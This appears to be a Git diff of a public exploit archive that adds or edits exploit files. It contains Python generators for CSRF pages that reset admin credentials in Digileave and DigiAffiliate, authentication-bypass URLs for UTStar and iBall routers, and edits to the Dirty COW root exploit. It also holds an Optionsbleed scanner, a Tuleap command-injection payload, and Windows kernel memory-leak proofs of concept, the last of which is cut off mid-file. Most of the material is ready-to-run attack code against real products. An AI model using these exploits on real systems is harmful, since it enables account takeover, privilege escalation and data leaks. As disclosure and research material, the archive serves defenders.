/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
ihsan[@]ihsan.net
+
Digileave 1.2 - CSRF (Update Admin)
################################################################################
'''
print e_baslik
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digileave: "))
id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8511): ")
csrfhtmlcode = '''
<html>
<body>
<form method="POST" action="%s/user_save.asp" name="user">
<table border="0" align="center">
<tbody><tr>
<td valign="middle">
<table border="0" align="center">
<tbody><tr>
<td bgcolor="gray" align="center">
<table width="400" cellspacing="1" cellpadding="2" border="0">
<tbody><tr>
<td colspan="2" bgcolor="cream" align="left">
<font color="red">User Update</font>
</td>
</tr>
<tr>
<td>
<font><b>Choose Login*</b></font>
</td>
<td>
<input name="login" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Choose Password*</b></font>
</td>
<td>
<input name="password" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>First Name*</b></font>
</td>
<td>
<input name="first_name" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Last Name*</b></font>
</td>
<td>
<input name="last_name" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Email*</b></font>
</td>
<td>
<input name="email" size="30" value="admin@admin.com" onblur="emailvalid(this);" type="text">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input name="id" value="%s" type="hidden">
<input value="Update" onclick="return check()" type="submit">
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</form>
''' %(url, id)
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print("")
csrfexploit()

111
platforms/asp/webapps/42738.py Executable file
View file

@ -0,0 +1,111 @@
#!/usr/local/bin/python
# # # # #
# Exploit Title: DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/digiaffiliate.asp?id=7
# Demo: http://www.digiappz.com/digiaffiliate/login.asp
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def csrfexploit():
e_baslik = '''
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
ihsan[@]ihsan.net
+
DigiAffiliate 1.4 - CSRF (Update Admin)
################################################################################
'''
print e_baslik
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digiaffiliate: "))
id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:220): ")
csrfhtmlcode = '''
<html>
<body>
<form method="POST" action="%s/user_save.asp" name="user">
<table border="0" align="center">
<tbody><tr>
<td valign="middle">
<table border="0" align="center">
<tbody><tr>
<td bgcolor="gray" align="center">
<table width="400" cellspacing="1" cellpadding="2" border="0">
<tbody><tr>
<td colspan="2" bgcolor="cream" align="left">
<font color="red">User Update</font>
</td>
</tr>
<tr>
<td>
<font><b>Choose Login*</b></font>
</td>
<td>
<input name="login" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Choose Password*</b></font>
</td>
<td>
<input name="password" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input name="id" value="%s" type="hidden">
<input value="Update" onclick="return check()" type="submit">
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</form>
''' %(url, id)
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print("")
csrfexploit()

35
platforms/hardware/webapps/42739.txt Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability
# CVE: CVE-2017-14243
# Date: 15-09-2017
# Exploit Author: Gem George
# Author Contact: https://www.linkedin.com/in/gemgrge
# Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem
# Firmware version: WA3002G4-0021.01
# Vendor Homepage: http://www.utstar.com/
# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass
Vulnerability Details
======================
The CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source.
How to reproduce
===================
Suppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi
Example URLs:
* http://192.168.1.1/info.cgi Status and details
* http://192.168.1.1/upload.cgi Firmware Upgrade
* http://192.168.1.1/backupsettings.cgi perform backup settings to PC
* http://192.168.1.1/pppoe.cgi PPPoE settings
* http://192.168.1.1/resetrouter.cgi Router reset
* http://192.168.1.1/password.cgi password settings
POC
=========
* https://www.youtube.com/watch?v=-wh1Y_jXMGk
-----------------------Greetz----------------------
++++++++++++++++++ www.0seccon.com ++++++++++++++++++
Saran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel

35
platforms/hardware/webapps/42740.txt Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: iBall ADSL2+ Home Router Authentication Bypass Vulnerability
# CVE: CVE-2017-14244
# Date: 15-09-2017
# Exploit Author: Gem George
# Author Contact: https://www.linkedin.com/in/gemgrge
# Vulnerable Product: iBall ADSL2+ Home Router WRA150N https://www.iball.co.in/Product/ADSL2--Home-Router/746
# Firmware version: FW_iB-LR7011A_1.0.2
# Vendor Homepage: https://www.iball.co.in
# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass
Vulnerability Details
======================
iBall ADSL2+ Home Router does not properly authenticate when pages are accessed through cgi version. This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, downloading backup configuration, upload backup etc.
How to reproduce
===================
Suppose 192.168.1.1 is the router IP and one of the valid page in router is is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi
Example URLs:
* http://192.168.1.1/info.cgi Status and details
* http://192.168.1.1/upload.cgi Firmware Upgrade
* http://192.168.1.1/backupsettings.cgi perform backup settings to PC
* http://192.168.1.1/pppoe.cgi PPPoE settings
* http://192.168.1.1/resetrouter.cgi Router reset
* http://192.168.1.1/password.cgi password settings
POC
=========
* https://www.youtube.com/watch?v=_SvrwCSdn54
-----------------------Greetz----------------------
++++++++++++++++++ www.0seccon.com ++++++++++++++++++
Saran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel

12
platforms/linux/local/37167.c
View file

@ -1,15 +1,3 @@
# Exploit Title: PonyOS <= 3.0 VFS permissions exploit
# Google Dork: [if applicable]
# Date: 29th May 2015
# Exploit Author: Hacker Fantastic
# Vendor Homepage: www.ponyos.org
# Software Link: [download link if available]
# Version: 3.0
# Tested on: 3.0
# CVE : N/A
# Source: https://github.com/HackerFantastic/Public/blob/master/exploits/rarity.c
/* MyLittleUnix <= 3.0 VFS permissions root exploit
================================================
File permissions are not checked, we can abuse

14
platforms/linux/local/40611.c
View file

@ -7,7 +7,7 @@ $ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
@ -23,7 +23,8 @@ m00000000000000000
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
void *map;
int f;
struct stat st;
@ -63,7 +64,7 @@ You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?
/*
You have to reset the file pointer to the memory position.
*/
lseek(f,map,SEEK_SET);
lseek(f,(uintptr_t) map,SEEK_SET);
c+=write(f,str,strlen(str));
}
printf("procselfmem %d\n\n", c);
@ -75,7 +76,10 @@ int main(int argc,char *argv[])
/*
You have to pass two arguments. File and Contents.
*/
if (argc<3)return 1;
if (argc<3) {
(void)fprintf(stderr, "%s\n",
"usage: dirtyc0w target_file new_content");
return 1; }
pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
@ -95,7 +99,7 @@ You have to use MAP_PRIVATE for copy-on-write mapping.
You have to open with PROT_READ.
*/
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %x\n\n",map);
printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/

76
platforms/linux/webapps/42745.py Executable file
View file

@ -0,0 +1,76 @@
#!/usr/bin/env python3
# Optionsbleed proof of concept test
# by Hanno Böck
import argparse
import urllib3
import re
def test_bleed(url, args):
r = pool.request('OPTIONS', url)
try:
allow = str(r.headers["Allow"])
except KeyError:
return False
if allow in dup:
return
dup.append(allow)
if allow == "":
print("[empty] %s" % (url))
elif re.match("^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$", allow):
z = [x.strip() for x in allow.split(',')]
if len(z) > len(set(z)):
print("[duplicates] %s: %s" % (url, repr(allow)))
elif args.all:
print("[ok] %s: %s" % (url, repr(allow)))
elif re.match("^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$", allow):
print("[spaces] %s: %s" % (url, repr(allow)))
else:
print("[bleed] %s: %s" % (url, repr(allow)))
return True
parser = argparse.ArgumentParser(
description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',
epilog="Tests server for Optionsbleed bug and other bugs in the allow header.\n\n"
"Autmatically checks http://, https://, http://www. and https://www. -\n"
"except if you pass -u/--url (which means by default we check 40 times.)\n\n"
"Explanation of results:\n"
"[bleed] corrupted header found, vulnerable\n"
"[empty] empty allow header, does not make sense\n"
"[spaces] space-separated method list (should be comma-separated)\n"
"[duplicates] duplicates in list (may be apache bug 61207)\n"
"[ok] normal list found (only shown with -a/--all)\n",
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('hosttocheck', action='store',
help='The hostname you want to test against')
parser.add_argument('-n', nargs=1, type=int, default=[10],
help='number of tests (default 10)')
parser.add_argument("-a", "--all", action="store_true",
help="show headers from hosts without problems")
parser.add_argument("-u", "--url", action='store_true',
help="pass URL instead of hostname")
args = parser.parse_args()
howoften = int(args.n[0])
dup = []
# Note: This disables warnings about the lack of certificate verification.
# Usually this is a bad idea, but for this tool we want to find vulnerabilities
# even if they are shipped with invalid certificates.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
pool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')
if args.url:
test_bleed(args.hosttocheck, args)
else:
for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:
for i in range(howoften):
try:
if test_bleed(prefix+args.hosttocheck, args) is False:
break
except Exception as e:
pass

2
platforms/multiple/dos/37721.c
View file

@ -62,9 +62,7 @@
magically dual-stack. That's because it uses new functions like
"getaddrinfo()" instead of old functions like "gethostbyname()".
Source: https://raw.githubusercontent.com/robertdavidgraham/cve-2015-5477/master/tkill.c
*/
#include <stdio.h>
#include <string.h>
#include <ctype.h>

66
platforms/php/webapps/41953.md Executable file
View file

@ -0,0 +1,66 @@
# Tuleap - Command Injection in Project Wiki
**CVE:** CVE-2017-7981
**CVSSv3:** 9.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:U/RC:C)
**Versions affected:** >= 8.3 and <= 9.6.99.86
## Introduction
Tuleap is a Libre suite to plan, track, code and collaborate on software
projects. Tuleap helps development teams to build awesome applications,
better, faster, easier.
## Background
Tuleap uses PHPWiki as a plugin to provide a weak feature for
projects. The version of PHPWiki used is 1.3.10. This version contains a
command injection vulnerability in the SyntaxHighlighter plugin. Other
applications that use PHPWiki similar to Tuleap will also be affected
by this issue.
The latest version of PHPWiki is 1.5.5 and is no longer vulnerable to this issue.
## Vulnerability
Authenticated users, including unprivileged users, with access to a
project containing a wiki, can exploit this command injection
(CI) vulnerability to gain remote unauthorised access to the server
hosting the Tuleap web application.
RCE is achieved by entering a SyntaxHighlighter plugin directive in a
new wiki page on any wiki available in any project. The SyntaxHighligter
plugin in vulnerable versions of PHPWiki passes the `syntax` argument
to the `proc_open()` PHP builtin function which spawns a process in the
operating system running the web application.
The following is an example plugin directie which would cause the `id(1)`
command to be executed on a Linux server running an affected version
of Tuleap.
```
<?plugin SyntaxHighlighter syntax="c;id"
code to be highlighted
?>
```
The result of the command execution can be seen in the image below.
![command execution](2017.04.tuleap-auth-ci.command-exec.png)
## Versions Affected
This vulnerability has existed in the version of PHPWiki used by the
Tuleap project since at least version 8.3 through to 9.6.99.86.
## References
https://github.com/xdrr/vulnerability-research/blob/master/webapp/tuleap/2017.04.tuleap-auth-ci.md
https://tuleap.net/plugins/tracker/?aid=10159
## Credit
This vulnerability was discovered by Ben N (pajexali@gmail.com) 19
April 2017.

38
platforms/php/webapps/41953.txt
View file

@ -1,38 +0,0 @@
CVE: CVE-2017-7981
CVSSv3: 9.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:U/RC:C)
Versions affected: >= 8.3 and <= 9.6.99.86
Introduction
Tuleap is a Libre suite to plan, track, code and collaborate on software projects. Tuleap helps development teams to build awesome applications, better, faster, easier.
Background
Tuleap uses PHPWiki as a plugin to provide a weak feature for projects. The version of PHPWiki used is 1.3.10. This version contains a command injection vulnerability in the SyntaxHighlighter plugin. Other applications that use PHPWiki similar to Tuleap will also be affected by this issue.
The latest version of PHPWiki is 1.5.5 and is no longer vulnerable to this issue.
Vulnerability
Authenticated users, including unprivileged users, with access to a project containing a wiki, can exploit this command injection (CI) vulnerability to gain remote unauthorised access to the server hosting the Tuleap web application.
RCE is achieved by entering a SyntaxHighlighter plugin directive in a new wiki page on any wiki available in any project. The SyntaxHighligter plugin in vulnerable versions of PHPWiki passes the syntax argument to the proc_open() PHP builtin function which spawns a process in the operating system running the web application.
The following is an example plugin directie which would cause the id(1) command to be executed on a Linux server running an affected version of Tuleap.
<?plugin SyntaxHighlighter syntax="c;id"
code to be highlighted
?>
Versions Affected
This vulnerability has existed in the version of PHPWiki used by the Tuleap project since at least version 8.3 through to 9.6.99.86.
References
https://github.com/xdrr/vulnerability-research/blob/master/webapp/tuleap/2017.04.tuleap-auth-ci.md
https://tuleap.net/plugins/tracker/?aid=10159
Credit
This vulnerability was discovered by Ben N 19 April 2017.

126
platforms/windows/dos/42741.cpp Executable file
View file

@ -0,0 +1,126 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1267&desc=2
We have discovered that the win32k!NtGdiGetGlyphOutline system call handler may disclose large portions of uninitialized pool memory to user-mode clients.
The function first allocates memory (using win32k!AllocFreeTmpBuffer) with a user-controlled size, then fills it with the outline data via win32k!GreGetGlyphOutlineInternal, and lastly copies the entire buffer back into user-mode address space. If the amount of data written by win32k!GreGetGlyphOutlineInternal is smaller than the size of the allocated memory region, the remaining part will stay uninitialized and will be copied in this form to the ring-3 client.
The bug can be triggered through the official GetGlyphOutline() API, which is a simple wrapper around the affected system call. The information disclosure is particularly severe because it allows the attacker to leak an arbitrary number of bytes from an arbitrarily-sized allocation, potentially enabling them to "collide" with certain interesting objects in memory.
Please note that the win32k!AllocFreeTmpBuffer routine works by first attempting to return a static block of 4096 bytes (win32k!gpTmpGlobalFree) for optimization, and only when it is already busy, a regular pool allocation is made. As a result, the attached PoC program will dump the contents of that memory region in most instances. However, if we enable the Special Pools mechanism for win32k.sys and start the program in a loop, we will occasionally see output similar to the following (for 64 leaked bytes). The repeated 0x67 byte in this case is the random marker inserted by Special Pools.
--- cut ---
00000000: 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 gggggggggggggggg
00000010: 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 gggggggggggggggg
00000020: 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 gggggggggggggggg
00000030: 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 gggggggggggggggg
--- cut ---
Interestingly, the bug is only present on Windows 7 and 8. On Windows 10, the following memset() call was added:
--- cut ---
.text:0018DD88 loc_18DD88: ; CODE XREF: NtGdiGetGlyphOutline(x,x,x,x,x,x,x,x)+5D
.text:0018DD88 push ebx ; size_t
.text:0018DD89 push 0 ; int
.text:0018DD8B push esi ; void *
.text:0018DD8C call _memset
--- cut ---
The above code pads the overall memory area with zeros, thus preventing any kind of information disclosure. This suggests that the issue was identified internally by Microsoft but only fixed in Windows 10 and not backported to earlier versions of the system.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
} else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
} else {
printf(".");
}
}
printf("\n");
}
}
int main(int argc, char **argv) {
if (argc < 2) {
printf("Usage: %s <number of bytes to leak>\n", argv[0]);
return 1;
}
UINT NumberOfLeakedBytes = strtoul(argv[1], NULL, 0);
// Create a Device Context.
HDC hdc = CreateCompatibleDC(NULL);
// Create a TrueType font.
HFONT hfont = CreateFont(1, // nHeight
1, // nWidth
0, // nEscapement
0, // nOrientation
FW_DONTCARE, // fnWeight
FALSE, // fdwItalic
FALSE, // fdwUnderline
FALSE, // fdwStrikeOut
ANSI_CHARSET, // fdwCharSet
OUT_DEFAULT_PRECIS, // fdwOutputPrecision
CLIP_DEFAULT_PRECIS, // fdwClipPrecision
DEFAULT_QUALITY, // fdwQuality
FF_DONTCARE, // fdwPitchAndFamily
L"Times New Roman");
// Select the font into the DC.
SelectObject(hdc, hfont);
// Get the glyph outline length.
GLYPHMETRICS gm;
MAT2 mat2 = { 0, 1, 0, 0, 0, 0, 0, 1 };
DWORD OutlineLength = GetGlyphOutline(hdc, 'A', GGO_BITMAP, &gm, 0, NULL, &mat2);
if (OutlineLength == GDI_ERROR) {
printf("[-] GetGlyphOutline#1 failed.\n");
DeleteObject(hfont);
DeleteDC(hdc);
return 1;
}
// Allocate memory for the outline + leaked data.
PBYTE OutputBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, OutlineLength + NumberOfLeakedBytes);
// Fill the buffer with uninitialized pool memory from the kernel.
OutlineLength = GetGlyphOutline(hdc, 'A', GGO_BITMAP, &gm, OutlineLength + NumberOfLeakedBytes, OutputBuffer, &mat2);
if (OutlineLength == GDI_ERROR) {
printf("[-] GetGlyphOutline#2 failed.\n");
HeapFree(GetProcessHeap(), 0, OutputBuffer);
DeleteObject(hfont);
DeleteDC(hdc);
return 1;
}
// Print the disclosed bytes on screen.
PrintHex(&OutputBuffer[OutlineLength], NumberOfLeakedBytes);
// Free resources.
HeapFree(GetProcessHeap(), 0, OutputBuffer);
DeleteObject(hfont);
DeleteDC(hdc);
return 0;
}

156
platforms/windows/dos/42742.cpp Executable file
View file

@ -0,0 +1,156 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1268
We have discovered that the nt!NtGdiGetPhysicalMonitorDescription system call discloses portions of uninitialized kernel stack memory to user-mode clients, on Windows 7 to Windows 10.
This is caused by the fact that the syscall copies a whole stack-based array of 256 bytes (128 wide-chars) to the caller, but typically only a small portion of the buffer is used to store the requested monitor description, while the rest of it remains uninitialized. This memory region contains sensitive information such as addresses of executable images, kernel stack, kernel pools and stack cookies.
The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call. An example output is as follows:
--- cut ---
00000000: 47 00 65 00 6e 00 65 00 72 00 69 00 63 00 20 00 G.e.n.e.r.i.c. .
00000010: 4e 00 6f 00 6e 00 2d 00 50 00 6e 00 50 00 20 00 N.o.n.-.P.n.P. .
00000020: 4d 00 6f 00 6e 00 69 00 74 00 6f 00 72 00 00 00 M.o.n.i.t.o.r...
00000030: 74 00 6f 00 72 00 2e 00 64 00 65 00 76 00 69 00 t.o.r...d.e.v.i.
00000040: 63 00 65 00 64 00 65 00 73 00 63 00 25 00 3b 00 c.e.d.e.s.c.%.;.
00000050: 47 00 65 00 6e 00 65 00 72 00 69 00 63 00 20 00 G.e.n.e.r.i.c. .
00000060: 4e 00 6f 00 6e 00 2d 00 50 00 6e 00 50 00 20 00 N.o.n.-.P.n.P. .
00000070: 4d 00 6f 00 6e 00 69 00 74 00 6f 00 72 00 00 00 M.o.n.i.t.o.r...
00000080: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
--- cut ---
If the stack spraying part of the PoC code is disabled, we can immediately observe various kernel-mode addresses in the dumped memory area.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <PhysicalMonitorEnumerationAPI.h>
#include <cstdio>
extern "C"
NTSTATUS WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
NTSTATUS(WINAPI *GetPhysicalMonitorDescription)(
_In_ HANDLE hMonitor,
_In_ DWORD dwPhysicalMonitorDescriptionSizeInChars,
_Out_ LPWSTR szPhysicalMonitorDescription
);
#define PHYSICAL_MONITOR_DESCRIPTION_SIZE 128
#define STATUS_SUCCESS 0
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PVOID ptr, BYTE byte, ULONG size) {
PBYTE _ptr = (PBYTE)ptr;
for (ULONG i = 0; i < size; i++) {
_ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static SIZE_T buffer[1024];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, ARRAYSIZE(buffer), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
WCHAR OutputBuffer[PHYSICAL_MONITOR_DESCRIPTION_SIZE];
HMODULE hGdi32 = LoadLibrary(L"gdi32.dll");
GetPhysicalMonitorDescription = (NTSTATUS(WINAPI *)(HANDLE, DWORD, LPWSTR))GetProcAddress(hGdi32, "GetPhysicalMonitorDescription");
// Create a window for referencing a monitor.
HWND hwnd = CreateWindowW(L"BUTTON", L"TestWindow", WS_OVERLAPPEDWINDOW | WS_VISIBLE,
CW_USEDEFAULT, CW_USEDEFAULT, 100, 100, NULL, NULL, 0, 0);
/////////////////////////////////////////////////////////////////////////////
// Source: https://msdn.microsoft.com/en-us/library/windows/desktop/dd692950(v=vs.85).aspx
/////////////////////////////////////////////////////////////////////////////
HMONITOR hMonitor = NULL;
DWORD cPhysicalMonitors;
LPPHYSICAL_MONITOR pPhysicalMonitors = NULL;
// Get the monitor handle.
hMonitor = MonitorFromWindow(hwnd, MONITOR_DEFAULTTOPRIMARY);
// Get the number of physical monitors.
BOOL bSuccess = GetNumberOfPhysicalMonitorsFromHMONITOR(hMonitor, &cPhysicalMonitors);
if (bSuccess) {
// Allocate the array of PHYSICAL_MONITOR structures.
pPhysicalMonitors = (LPPHYSICAL_MONITOR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cPhysicalMonitors * sizeof(PHYSICAL_MONITOR));
if (pPhysicalMonitors != NULL) {
// Get the array.
bSuccess = GetPhysicalMonitorsFromHMONITOR(hMonitor, cPhysicalMonitors, pPhysicalMonitors);
if (bSuccess) {
for (DWORD i = 0; i < cPhysicalMonitors; i++) {
RtlZeroMemory(OutputBuffer, sizeof(OutputBuffer));
SprayKernelStack();
NTSTATUS st = GetPhysicalMonitorDescription(pPhysicalMonitors[i].hPhysicalMonitor, PHYSICAL_MONITOR_DESCRIPTION_SIZE, OutputBuffer);
if (st == STATUS_SUCCESS) {
PrintHex((PBYTE)OutputBuffer, sizeof(OutputBuffer));
} else {
printf("[-] GetPhysicalMonitorDescription failed, %x\n", st);
}
}
// Close the monitor handles.
bSuccess = DestroyPhysicalMonitors(cPhysicalMonitors, pPhysicalMonitors);
}
// Free the array.
HeapFree(GetProcessHeap(), 0, pPhysicalMonitors);
}
}
DestroyWindow(hwnd);
return 0;
}

115
platforms/windows/dos/42743.cpp Executable file
View file

@ -0,0 +1,115 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1269
We have discovered that the nt!NtRemoveIoCompletion system call handler discloses 4 bytes of uninitialized pool memory to user-mode clients on 64-bit platforms.
The bug manifests itself while passing the IO_STATUS_BLOCK structure back to user-mode. The structure is defined as follows:
--- cut ---
typedef struct _IO_STATUS_BLOCK {
union {
NTSTATUS Status;
PVOID Pointer;
};
ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
--- cut ---
On 64-bit Windows builds, the "Pointer" field is 64 bits in width while the "Status" field is 32-bits wide. This means that if only "Status" is initialized, the upper 32 bits of "Pointer" remain garbage. This is what happens in the nt!NtSetIoCompletion syscall, which allocates a completion packet with a nested IO_STATUS_BLOCK structure (from the pools or a lookaside list), and only sets the .Status field to a user-controlled 32-bit value, leaving the remaining part of the union untouched.
Furthermore, the nt!NtRemoveIoCompletion system call doesn't rewrite the structure to only pass the relevant data back to user-mode, but copies it in its entirety, thus disclosing the uninitialized 32 bits of memory to the ring-3 client. The attached proof-of-concept program illustrates the problem by triggering the vulnerability in a loop, and printing out the leaked value. When run on Windows 7 x64, we're seeing various upper 32-bit portions of kernel-mode pointers:
--- cut ---
Leak: FFFFF80011111111
Leak: FFFFF80011111111
Leak: FFFFF80011111111
Leak: FFFFF80011111111
...
Leak: FFFFF88011111111
Leak: FFFFF88011111111
Leak: FFFFF88011111111
Leak: FFFFF88011111111
...
Leak: FFFFFA8011111111
Leak: FFFFFA8011111111
Leak: FFFFFA8011111111
Leak: FFFFFA8011111111
--- cut ---
We suspect that the monotony in the nature of the disclosed value is caused by the usage of a lookaside list, and it could likely be overcome by depleting the list and forcing the kernel to fall back on regular pool allocations. Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
The issue was discovered by James Forshaw of Google Project Zero.
*/
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")
extern "C" NTSTATUS __stdcall NtCreateIoCompletion(
PHANDLE IoCompletionHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
DWORD NumberOfConcurrentThreads
);
extern "C" NTSTATUS __stdcall NtRemoveIoCompletion(
HANDLE IoCompletionHandle,
PUINT_PTR KeyContext,
PUINT_PTR ApcContext,
PIO_STATUS_BLOCK IoStatusBlock,
PLARGE_INTEGER Timeout
);
extern "C" NTSTATUS __stdcall NtSetIoCompletion(
HANDLE IoCompletionHandle,
UINT_PTR KeyContext,
